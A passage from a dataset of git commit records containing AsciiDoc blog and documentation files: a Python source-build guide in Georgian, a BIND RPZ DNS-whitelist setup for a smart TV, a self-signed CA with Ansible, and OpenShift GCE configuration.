\u10d3\u10d0\u10dc - https:\/\/www.python.org\/ftp\/python\/[Python Source Code] \u10d5\u10d8\u10e0\u10e9\u10d4\u10d5\u10d7 \u10d1\u10dd\u10da\u10dd \u10d5\u10d4\u10e0\u10e1\u10d8\u10d0\u10e1 3.5.1 \u10d3\u10d0 \u10d5\u10d8\u10ec\u10d4\u10e0\u10d7 *.tgz \u10e4\u10dd\u10e0\u10db\u10d0\u10e2\u10d8\u10e1 \u10e4\u10d0\u10d8\u10da\u10e1 Python-3.5.1.tgz \u10e8\u10d4\u10db\u10d3\u10d4\u10d2 \u10d5\u10ee\u10e1\u10dc\u10d8\u10d7 \u10e2\u10d4\u10e0\u10db\u10d8\u10dc\u10d0\u10da\u10e1 \u10d3\u10d0 \u10d5\u10e3\u10e8\u10d5\u10d4\u10d1\u10d7 \u10e5\u10d5\u10d4\u10db\u10dd\u10d7 \u10db\u10dd\u10ea\u10d4\u10db\u10e3\u10da \u10d1\u10e0\u10eb\u10d0\u10dc\u10d4\u10d1\u10d4\u10d1\u10e1\n\n * wget http:\/\/python.org\/ftp\/python\/3.5.1\/Python-3.5.1.tgz\n * tar -xvf Python-3.5.1.tgz\n * cd Python-3.5.1\n * .\/configure\n * make\n * make altinstall\n \n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d8\u10e1 \u10de\u10e0\u10dd\u10ea\u10d4\u10e1\u10d8 \u10ec\u10d0\u10e0\u10db\u10d0\u10e2\u10d4\u10d1\u10d8\u10d7 \u10d3\u10d0\u10e1\u10e0\u10e3\u10da\u10d3\u10d0.\n\n\u10dc\u10d0\u10ee\u10d4\u10d7 \u10e1\u10e3\u10e0\u10d0\u10d7\u10d8\nimage:https:\/\/raw.githubusercontent.com\/Lh4cKg\/Lh4cKg.github.io\/master\/images\/pythonge.png []\n\n:hp-tags: title[\u10de\u10d8\u10d7\u10dd\u10dc\u10d8],title[\u10da\u10d8\u10dc\u10e3\u10e5\u10e1\u10d8]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"abe2c9ee6c5015bdce518cb0708264bfbdf9ecd3","subject":"Update 2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","message":"Update 2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","repos":"topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io","old_file":"_posts\/2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","new_file":"_posts\/2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","new_contents":"= DNS Whitelist in BIND with RPZ\n :hp-image: \/covers\/cover.png\n :hp-tags: DNS, Filtering, Firewall, Security\n\nI recently got a Samsung 'smart' TV which is very nice to look at.\n\nUnfortunately there have been numerous privacy issues with smart TV's of all kinds, and Samsung in http:\/\/www.bbc.com\/news\/technology-31296188[particular]. So to be safe I initially decided to block the TV completely from connecting to the internet, by blocking it at my router.\n\nAs it turns out however, the built-in Netflix app on the TV is the only way I can watch true UHD (10bit colour) 4k content on the TV (don't get me started!)\n\nSo I found myself in a situation where I needed to allow the TV to connect out to the internet, despite my misgivings.\n\nBut this got me thinking - could I somehow limit it's access to just Netflix? I modified the router ACL to allow it talk to all the IPv4 prefixes announced by AS2906 [Netflix Streaming Services Inc.] This unfortunately didn't work, without looking too deeply it seemed Akamai was involved in at least some of the traffic. Either way the app didn't work, I could have continued to investigate and added more IP ranges to the ACL to make it work, but it seemed like a lot of trouble.\n\nRuling out cumbersome IP based blocking I began to wonder could I perhaps limit it's access by restricting the domain names it could resolve?\n\n== Enter DNS RPZ\n\nI am relatively familiar with Bind having used it down through the years, and one feature in particular suggested it might help - Response Policy Zones.\n\nBasically RPZ can be used to create a DNS \"firewall,\" limiting what domains can be resolved. There is plenty of information online about how this can be set up, however I didn't find anything specifically explaining how to do what I needed (a total blacklist with only a very small whitelist of domains).\n\nTurns out it's fairly easy to do.\n\n== Bind Configuration\n\nThe first step is to get a basic Bind resolver up and running. I did this with a Ubuntu 16.04 system.\n\nI then defined two RPZ 'zones' in the 'options' section of my named.conf (on my particular system I did it in \/etc\/bind\/named.conf.options). The key thing here is that RPZ checks zones in the order they are listed - this is key to creating a whitelist as opposed to a blacklist. A single line is required:\n\n response-policy { zone \"rpz.whitelist\"; zone \"rpz\"; };\n \nAll queries will then be filtered based on the response policy zones listed. If a match is found in the first (rpz.whitelist) then that will be used, otherwise the second one (rpz) will be checked.\n\nThe Bind server needs to be configured as authorititive master for these zones, similar to a standard zone, although with \"allow-query\" set to none. Again this is in named.conf (in my case \/etc\/bind\/named.conf.default-zones):\n\n zone \"rpz.whitelist\" {\n type master;\n file \"\/etc\/bind\/db.rpz.whitelist\";\n allow-query { none; };\n };\n \n zone \"rpz\" {\n type master;\n file \"\/etc\/bind\/db.rpz\";\n allow-query { none; };\n };\n\nAs can be seen the zone definitions reference the location of the zone file for each. The files are created as follows, using the RPZ syntax. The first zone, rpz.whitelist, lists the domains I had worked out Netflix used:\n\n_\/etc\/bind\/db.rpz.whitelist_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum \n IN NS localhost.\n \n netflix.com CNAME rpz-passthru.\n *.netflix.com CNAME rpz-passthru.\n \n nflximg.com CNAME rpz-passthru.\n *.nflximg.com CNAME rpz-passthru.\n \n nflximg.net CNAME rpz-passthru.\n *.nflximg.net CNAME rpz-passthru.\n....\n \n\nNote that for each domain I have included the 'apex' record, and also a wildcard to catch all sub-domains. In each case they are listed as CNAME records pointing to rpz-passthru, which is the RPZ syntax to tell Bind to allow queries for them.\n\nThe second RPZ zone file is created as follows. This is configured for all sub-domains of the root zone, with a CNAME pointing to \".\" (which tells RPZ to return NXDOMAIN for such a lookup). As the trailing dot (root zone) is left out of entries in RPZ zones, an asterix on it's own is all that is needed to represent subdomains of the DNS root:\n\n_\/etc\/bind\/db.rpz_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum \n IN NS localhost.\n\n* CNAME .\n....\n\nWith the config in place I was able to reload Bind and check if it was working. \n\n\n== Results\n\nSo does it work. If I try to resolve a random domain I get an NXDOMAIN response:\n\n....\ntopranks@dnsvm:~$ dig A www.samsung.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.samsung.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14003\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 2\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.samsung.com.\t\tIN\tA\n....\n\n\nAnd if I try for a sub-domain of netflix.com I get a valid response:\n\n....\ntopranks@dnsvm:~$ dig A www.netflix.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.netflix.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59390\n;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 4, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.netflix.com.\t\tIN\tA\n\n;; ANSWER SECTION:\nwww.netflix.com.\t1800\tIN\tCNAME\twww.geo.netflix.com.\nwww.geo.netflix.com.\t1800\tIN\tCNAME\twww.eu-west-1.prodaa.netflix.com.\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.165.126\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.19.164.15\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.178.51\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.156.83\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.202.184\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.15.72\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.81.52\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.174.58\n....\n\n== Additions for my Smart TV case\n\nIn addition to the above I changed the ACL on for traffic coming from the TV to only allow TCP on ports 80 and 443, which is enough for Netflix, but importantly blocks the TV from using any external DNS (even in normal circumstances it looks like the TV will use 8.8.8.8 in addition to any configured DNS server entered on it).\n\nFinally on the TV I changed the DNS server and sure enough the TV thinks something is wrong with DNS:\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/4465905\/26027929\/bd59e8b2-380e-11e7-81b1-b8b2b8fd2ffe.JPG[Samsung Error Message]\n\nSo far so good, and yes the Netflix app still works fine. Looking closely at my Bind logs I can see what's happening:\n\n....\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.003 queries: info: client 192.168.240.42#40665 (art-0.nflximg.net): query: art-0.nflximg.net IN A + (192.168.240.32)\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.003 rpz: info: client 192.168.240.42#40665 (art-0.nflximg.net): rpz QNAME PASSTHRU rewrite art-0.nflximg.net via art-0.nflximg.net.rpz.netflix\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.766 queries: info: client 192.168.240.42#34179 (ns11.whois.co.kr): query: ns11.whois.co.kr IN A + (192.168.240.32)\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.766 rpz: info: client 192.168.240.42#34179 (ns11.whois.co.kr): rpz QNAME NXDOMAIN rewrite ns11.whois.co.kr via ns11.whois.co.kr.rpz\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.031 queries: info: client 192.168.240.42#59989 (time.samsungcloudsolution.com): query: time.samsungcloudsolution.com IN A + (192.168.240.32)\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.031 rpz: info: client 192.168.240.42#59989 (time.samsungcloudsolution.com): rpz QNAME NXDOMAIN rewrite time.samsungcloudsolution.com via time.samsungcloudsolution.com.rpz\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.033 queries: info: client 192.168.240.42#36357 (time.samsungcloudsolution.com): query: time.samsungcloudsolution.com IN A + (192.168.240.32)\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.033 rpz: info: client 192.168.240.42#36357 (time.samsungcloudsolution.com): rpz QNAME NXDOMAIN rewrite time.samsungcloudsolution.com via time.samsungcloudsolution.com.rpz\n....\n\n\nSo yeah, probably not ideal as the TV can still get out to the internet, at least on 80 and 443 TCP, but without DNS I've hopefully limited how much it can do.\n \n \n \n \n \n \n \n\n \n \n\n\n\n\n\n","old_contents":"= DNS Whitelist in BIND with RPZ\n :hp-image: \/covers\/cover.png\n :hp-tags: DNS, Filtering, Firewall, Security\n\nI recently got a Samsung 'smart' TV which is very nice to look at.\n\nUnfortunately there have been numerous privacy issues with smart TV's of all kinds, and Samsung in http:\/\/www.bbc.com\/news\/technology-31296188[particular]. So to be safe I initially decided to block the TV completely from connecting to the internet, by blocking it at my router.\n\nAs it turns out however, the built-in Netflix app on the TV is the only way I can watch true UHD (10bit colour) 4k content on the TV (don't get me started!)\n\nSo I found myself in a situation where I needed to allow the TV to connect out to the internet, despite my misgivings.\n\nBut this got me thinking - could I somehow limit it's access to just Netflix? I modified the router ACL to allow it talk to all the IPv4 prefixes announced by AS2906 [Netflix Streaming Services Inc.] This unfortunately didn't work, without looking too deeply it seemed Akamai was involved in at least some of the traffic. Either way the app didn't work, I could have continued to investigate and added more IP ranges to the ACL to make it work, but it seemed like a lot of trouble.\n\nRuling out cumbersome IP based blocking I began to wonder could I perhaps limit it's access by restricting the domain names it could resolve?\n\n== Enter DNS RPZ\n\nI am relatively familiar with Bind having used it down through the years, and one feature in particular suggested it might help - Response Policy Zones.\n\nBasically RPZ can be used to create a DNS \"firewall,\" limiting what domains can be resolved. There is plenty of information online about how this can be set up, however I didn't find anything specifically explaining how to do what I needed (a total blacklist with only a very small whitelist of domains).\n\nTurns out it's fairly easy to do.\n\n== Bind Configuration\n\nThe first step is to get a basic Bind resolver up and running. I did this with a Ubuntu 16.04 system.\n\nI then defined two RPZ 'zones' in the 'options' section of my named.conf (on my particular system I did it in \/etc\/bind\/named.conf.options). The key thing here is that RPZ checks zones in the order they are listed - this is key to creating a whitelist as opposed to a blacklist. A single line is required:\n\n response-policy { zone \"rpz.whitelist\"; zone \"rpz\"; };\n \nAll queries will then be filtered based on the response policy zones listed. If a match is found in the first (rpz.whitelist) then that will be used, otherwise the second one (rpz) will be checked.\n\nThe Bind server needs to be configured as authorititive master for these zones, similar to a standard zone, although with \"allow-query\" set to none. Again this is in named.conf (in my case \/etc\/bind\/named.conf.default-zones):\n\n zone \"rpz.whitelist\" {\n type master;\n file \"\/etc\/bind\/db.rpz.whitelist\";\n allow-query { none; };\n };\n \n zone \"rpz\" {\n type master;\n file \"\/etc\/bind\/db.rpz\";\n allow-query { none; };\n };\n\nAs can be seen the zone definitions reference the location of the zone file for each. The files are created as follows, using the RPZ syntax. The first zone, rpz.whitelist, lists the domains I had worked out Netflix used:\n\n_\/etc\/bind\/db.rpz.whitelist_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum \n IN NS localhost.\n \n netflix.com CNAME rpz-passthru.\n *.netflix.com CNAME rpz-passthru.\n \n nflximg.com CNAME rpz-passthru.\n *.nflximg.com CNAME rpz-passthru.\n \n nflximg.net CNAME rpz-passthru.\n *.nflximg.net CNAME rpz-passthru.\n....\n \n\nNote that for each domain I have included the 'apex' record, and also a wildcard to catch all sub-domains. In each case they are listed as CNAME records pointing to rpz-passthru, which is the RPZ syntax to tell Bind to allow queries for them.\n\nThe second RPZ zone file is created as follows. This is configured for all sub-domains of the root zone, with a CNAME pointing to \".\" (which tells RPZ to return NXDOMAIN for such a lookup). As the trailing dot (root zone) is left out of entries in RPZ zones, an asterix on it's own is all that is needed to represent subdomains of the DNS root:\n\n_\/etc\/bind\/db.rpz_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum \n IN NS localhost.\n\n* CNAME .\n....\n\nWith the config in place I was able to reload Bind and check if it was working. \n\n\n== Results\n\nSo does it work. If I try to resolve a random domain I get an NXDOMAIN response:\n\n....\ntopranks@dnsvm:~$ dig A www.samsung.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.samsung.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14003\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 2\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.samsung.com.\t\tIN\tA\n....\n\n\nAnd if I try for a sub-domain of netflix.com I get a valid response:\n\n....\ntopranks@dnsvm:~$ dig A www.netflix.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.netflix.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59390\n;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 4, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.netflix.com.\t\tIN\tA\n\n;; ANSWER SECTION:\nwww.netflix.com.\t1800\tIN\tCNAME\twww.geo.netflix.com.\nwww.geo.netflix.com.\t1800\tIN\tCNAME\twww.eu-west-1.prodaa.netflix.com.\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.165.126\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.19.164.15\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.178.51\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.156.83\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.202.184\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.15.72\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.81.52\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.174.58\n....\n\n== Additions for my Smart TV case\n\nIn addition to the above I changed the ACL on for traffic coming from the TV to only allow TCP on ports 80 and 443, which is enough for Netflix, but importantly blocks the TV from using any external DNS (even in normal circumstances it looks like the TV will use 8.8.8.8 in addition to any configured DNS server entered on it).\n\nFinally on the TV I changed the DNS server and sure enough the TV thinks something is wrong:\n\n\n\n\n \n \n \n \n \n \n \n\n \n \n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d86a51ed3e54ef52401d7298ecec0b71cf20976c","subject":"Final changes on build your own CA with Ansible","message":"Final changes on build your own CA with Ansible\n","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2020-11-28-Build-your-own-CA-with-Ansible.adoc","new_file":"_posts\/2020-11-28-Build-your-own-CA-with-Ansible.adoc","new_contents":"= Build your own CA with Ansible\n:page-tags: [ansible]\n:page-image: \/images\/logos\/ansible.png\n:source_dir: ..\/sources\/2020-11-28-Build-your-own-CA-with-Ansible\n:image_dir: ..\/images\/2020-11-28-Build-your-own-CA-with-Ansible\n:published_at: 2020-11-28\n:page-layout: post\n:page-description: \"How to generate certificates with Ansible.\"\n\nSecuring your Kafka, Elasticsearch, Cassandra, or whatever distributed software requires configuring using SSL (also known as TLS) to encrypt communications:\n\n* Node to node communication\n* Client to node communication\n\nSetting up SSL means providing SSL certificates for each node.\nBut generating SSL certificates is a cumbersome task:\n\n* The https:\/\/kafka.apache.org\/documentation\/#security_ssl[Kafka documentation] describes extensively the process.\n* Elasticsearch brings its own https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/master\/configuring-tls.html#node-certificates[elasticsearch-certutil] tool.\n* Datastax also https:\/\/docs.datastax.com\/en\/cassandra-oss\/3.x\/cassandra\/configuration\/secureSSLCertWithCA.html[documents] a similar process for Cassandra\n\nI will describe here how to generate an SSL certificate for each node using Ansible.\nIt makes sense as I am also deploying Kafka, Elasticsearch and the like with Ansible.\n\nThere are several important rules to know when generating certificates:\n\n* The name present in the certificate must match the public name of the host.\n We can not share the same certificate on all nodes unless using star certificates.\n Any TLS client connecting to a node will check that certificate name and hostname matches unless disabling hostname verification.\n* The name present in the certificate, should match the reverse DNS name corresponding to the IP of the host.\n Java clients connecting to a node, will do a reverse DNS lookup to get the public name of the host they are connecting to.\n\nThese two rules are meant to prevent *Man in the middle* attacks. \nA TLS certificate allows checking you're talking to the wanted target, \nnot something in between which could spy and steal information.\n\nWhen a machine has multiple names (think about DNS aliases, virtual hosts), a certificate can contain multiple names.\nThe main name is called CN (Common Name), \nwhile other names are called SAN (Subject Alt Names).\n\n== The certificate authority\n\nAs Kafka or Elasticsearch clusters should never be publicly exposed,\nusing a public certificate authority (Thawte, Verisign and the like) is not necessary.\nA self-signed certificate authority local to the cluster or the environment (Dev, Q\/A) should be enough.\n\nSo the first step is to create a certificate authority that will be used to sign the certificates of all hosts belonging to our cluster.\nAs this step will be done only once, I won't automate it.\n\n[source,shell]\n----\n$ mkdir ownca\n$ openssl req -new -x509 \\\n -days 1825 \\ <1>\n -extensions v3_ca \\ <2>\n -keyout ownca\/root.key -out ownca\/root.crt <3>\n\nGenerating a RSA private key\n......+++++\n....+++++\nwriting new private key to 'ownca\/root.key'\nEnter PEM pass phrase: <4>\nVerifying - Enter PEM pass phrase:\n-----\nYou are about to be asked to enter information that will be incorporated\ninto your certificate request.\nWhat you are about to enter is what is called a Distinguished Name or a DN.\nThere are quite a few fields but you can leave some blank\nFor some fields there will be a default value,\nIf you enter '.', the field will be left blank.\n-----\nCountry Name (2 letter code) [AU]:FR <5>\nState or Province Name (full name) [Some-State]:.\nLocality Name (eg, city) []:.\nOrganization Name (eg, company) [Internet Widgits Pty Ltd]:eNova Conseil\nOrganizational Unit Name (eg, section) []:.\nCommon Name (e.g. server FQDN or YOUR name) []:Root\nEmail Address []:rootca@enova-conseil.com\n----\n<1> The CA root certificate will last 5 years\n<2> This certificate will be used as a CA\n<3> Generate both key and self-signed certificate\n<4> The key is protected with a password\n<5> Information describing the Root certificate\n\nFor safety reasons, the generated key should be kept secret and stored in a secure place:\n\n* It must not be transfered to target Kafka servers\n* It must not be kept in source control (Git) unless hidden in Ansible Vault password file\n\n== The nodes certificates\n\nThis is where Ansible comes in.\nAs your cluster might have many nodes, automating certificate generation makes sense.\nFor each target host, I will repeat the same process:\n\nimage::{image_dir}\/process.svg[Process]\n\n. On the target host, generate a key `target.key` and a CSR (Certificate signing request) `target.csr`\n. Pull the CSR on the control host. \n. Sign the CSR with the CA key.\n This will generate a certificate `target.crt`.\n. Push the generated certificate `target.crt` on the target host.\n The CA certificate `root.crt` is also pushed.\n\nAs the TLS keys `.key` are sensitive, they do not travel, they stay where they were generated.\nOn the contrary, certificates `.crt` and CSRs `.csr` only contain public information.\n\n[source,yaml]\n----\ninclude::{source_dir}\/openssl\/tasks\/main.yml[tags=main]\n----\n\nOnce you have the key, the certificate and CA certificate chain on the target host, you can start using them:\n\n[source,yaml]\n----\ninclude::{source_dir}\/openssl\/tasks\/main.yml[tags=after]\n----\n\nThe produced PKCS12 file can be used as a Java Keystore. The `java_keystore` Ansible module can be used to create a JKS file instead.\n\nThe attentive reader has noticed I am using a bunch of `openssl_xxx` Ansible modules (namely `openssl_privatekey`, `openssl_csr`, `openssl_certificate` and `openssl_pkcs12`).\nThese modules require to have openssl and PyOpenSSL installed on each host.\n\n[source,yaml]\n----\ninclude::{source_dir}\/openssl\/tasks\/main.yml[tags=before]\n----\n","old_contents":"= Build your own CA with Ansible\n:page-tags: [ansible]\n:page-image: \/images\/logos\/ansible.png\n:source_dir: ..\/sources\/2020-11-28-Build-your-own-CA-with-Ansible\n:image_dir: ..\/images\/2020-11-28-Build-your-own-CA-with-Ansible\n:published_at: 2020-11-28\n:page-layout: post\n:page-description: \"How to generate certificates with Ansible.\"\n\nSecuring your Kafka, Elasticsearch, Cassandra, or whatever distributed software means using SSL (also known as TLS) to encrypt communications:\n\n* Node to node communication\n* Client to node communication\n\nSetting up SSL means providing SSL certificates for each node.\nGenerating SSL certificates is a cumbersome task:\n\n* The https:\/\/kafka.apache.org\/documentation\/#security_ssl[Kafka documentation] describes extensively the process.\n* Elasticsearch brings its own https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/master\/configuring-tls.html#node-certificates[elasticsearch-certutil] tool.\n* Datastax also https:\/\/docs.datastax.com\/en\/cassandra-oss\/3.x\/cassandra\/configuration\/secureSSLCertWithCA.html[documents] a similar process for Cassandra\n\nI will describe here how to generate an SSL certificate for each node using Ansible,\nbecause I am also deploying Kafka, Elasticsearch and the like with Ansible.\n\nThere are several important rules to know when generating certificates:\n\n* The name present in the certificate must match the public name of the host.\n We can not share the same certificate on all nodes unless using star certificates.\n Any TLS client connecting to a node will check that certificate name and hostname matches unless disabling hostname verification.\n* The name present in the certificate, should match the reverse DNS name corresponding to the IP of the host.\n Java clients connecting to a node, will do a reverse DNS lookup to get the public name of the host they are connecting to.\n\nThese two rules are meant to prevent *Man in the middle* attacks. \nA TLS certificate allows checking you're talking to the wanted target, \nnot something in between which could spy and steal information.\n\nWhen a machine has multiple names (think about DNS aliases, virtual hosts), a certificate can contain multiple names.\nThe main name is called CN (Common Name), \nwhile other names are called SAN (Subject Alt Names).\n\n== The certificate authority\n\nAs Kafka or Elasticsearch clusters should never be publicly exposed,\nusing a public certificate authority (Thawte, Verisign and the like) is not necessary.\nA self-signed certificate authority local to the cluster or the environment (Dev, Q\/A) should be enough.\n\nSo the first step is to create a certificate authority that will be used to sign the certificates of all hosts belonging to our cluster.\nAs this step will be done only once, I won't automate it.\n\n[source,shell]\n----\n$ mkdir ownca\n$ openssl req -new -x509 \\\n -days 1825 \\ <1>\n -extensions v3_ca \\ <2>\n -keyout ownca\/root.key -out ownca\/root.crt <3>\n\nGenerating a RSA private key\n......+++++\n....+++++\nwriting new private key to 'ownca\/root.key'\nEnter PEM pass phrase: <4>\nVerifying - Enter PEM pass phrase:\n-----\nYou are about to be asked to enter information that will be incorporated\ninto your certificate request.\nWhat you are about to enter is what is called a Distinguished Name or a DN.\nThere are quite a few fields but you can leave some blank\nFor some fields there will be a default value,\nIf you enter '.', the field will be left blank.\n-----\nCountry Name (2 letter code) [AU]:FR <5>\nState or Province Name (full name) [Some-State]:.\nLocality Name (eg, city) []:.\nOrganization Name (eg, company) [Internet Widgits Pty Ltd]:eNova Conseil\nOrganizational Unit Name (eg, section) []:.\nCommon Name (e.g. server FQDN or YOUR name) []:Root\nEmail Address []:rootca@enova-conseil.com\n----\n<1> The CA root certificate will last 5 years\n<2> This certificate will be used as a CA\n<3> Generate both key and self-signed certificate\n<4> The key is protected with a password\n<5> Information describing the Root certificate\n\nFor safety reasons, the generated key should be kept secret and stored in a secure place:\n\n* It must not be transfered to target Kafka servers\n* It must not be kept in source control (Git) unless hidden in Ansible Vault password file\n\n== The nodes certificates\n\nThis is where Ansible comes in.\nAs your cluster might have many nodes, automating certificate generation makes sense.\nFor each target host, I will repeat the same process:\n\nimage::{image_dir}\/process.svg[Process]\n\n. On the target host, generate a key `target.key` and a CSR (Certificate signing request) `target.csr`\n. Pull the CSR on the control host. \n. Sign the CSR with the CA key.\n This will generate a certificate `target.crt`.\n. Push the generated certificate `target.crt` on the target host.\n The CA certificate `root.crt` is also pushed.\n\nAs the TLS keys `.key` are sensitive, they do not travel, they stay where they were generated.\nOn the contrary, certificates `.crt` and CSRs `.csr` only contain public information.\n\n[source,yaml]\n----\ninclude::{source_dir}\/openssl\/tasks\/main.yml[tags=main]\n----\n\nOnce you have the key, the certificate and CA certificate chain on the target host, you can start using them:\n\n[source,yaml]\n----\ninclude::{source_dir}\/openssl\/tasks\/main.yml[tags=after]\n----\n\nThe produced PKCS12 file can be used as a Java Keystore. The `java_keystore` Ansible module can be used to create a JKS file instead.\n\nThe attentive reader has noticed I am using a bunch of `openssl_xxx` Ansible modules (namely `openssl_privatekey`, `openssl_csr`, `openssl_certificate` and `openssl_pkcs12`).\nThese modules require to have openssl and PyOpenSSL installed on each host.\n\n[source,yaml]\n----\ninclude::{source_dir}\/openssl\/tasks\/main.yml[tags=before]\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c8e52e3f57acfcf8ba5ef3c54475dd9633382f69","subject":"Add unique anchors for Config GCE sections","message":"Add unique anchors for Config GCE sections\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"install_config\/configuring_gce.adoc","new_file":"install_config\/configuring_gce.adoc","new_contents":"= Configuring for GCE\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Overview\nOpenShift can be configured to access an\nlink:https:\/\/cloud.google.com\/compute\/docs\/disks\/[GCE infrastructure], including\nlink:..\/install_config\/persistent_storage\/persistent_storage_gce.html[using GCE\nvolumes as persistent storage] for application data. After GCE is configured\nproperly, some additional configurations will need to be completed on the\nOpenShift hosts.\n\n[[gce-configuring-masters]]\n== Configuring Masters\n\nEdit or\nlink:..\/install_config\/master_node_configuration.html#creating-new-configuration-files[create] the\nmaster configuration file on all masters\n(*_\/etc\/origin\/master\/master-config.yaml_* by default) and update the\ncontents of the `*apiServerArguments*` and `*controllerArguments*` sections:\n\n====\n[source,yaml]\n----\nkubernetesMasterConfig:\n ...\n apiServerArguments:\n cloud-provider:\n - \"gce\"\n controllerArguments:\n cloud-provider:\n - \"gce\"\n\n----\n====\n\n[[gce-configuring-nodes]]\n== Configuring Nodes\n\nEdit or\nlink:..\/install_config\/master_node_configuration.html#creating-new-configuration-files[create]\nthe node configuration file on all nodes (*_\/etc\/origin\/node\/node-config.yaml_*\nby default) and update the contents of the `*kubeletArguments*` section:\n\n====\n[source,yaml]\n----\nkubeletArguments:\n cloud-provider:\n - \"gce\"\n\n----\n====\n\nStart or restart the OpenShift services on the master and all nodes.\n","old_contents":"= Configuring for GCE\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Overview\nOpenShift can be configured to access an\nlink:https:\/\/cloud.google.com\/compute\/docs\/disks\/[GCE infrastructure], including\nlink:..\/install_config\/persistent_storage\/persistent_storage_gce.html[using GCE\nvolumes as persistent storage] for application data. After GCE is configured\nproperly, some additional configurations will need to be completed on the\nOpenShift hosts.\n\n== Configuring Masters\n\nEdit or\nlink:..\/install_config\/master_node_configuration.html#creating-new-configuration-files[create] the\nmaster configuration file on all masters\n(*_\/etc\/origin\/master\/master-config.yaml_* by default) and update the\ncontents of the `*apiServerArguments*` and `*controllerArguments*` sections:\n\n====\n[source,yaml]\n----\nkubernetesMasterConfig:\n ...\n apiServerArguments:\n cloud-provider:\n - \"gce\"\n controllerArguments:\n cloud-provider:\n - \"gce\"\n\n----\n====\n\n== Configuring Nodes\n\nEdit 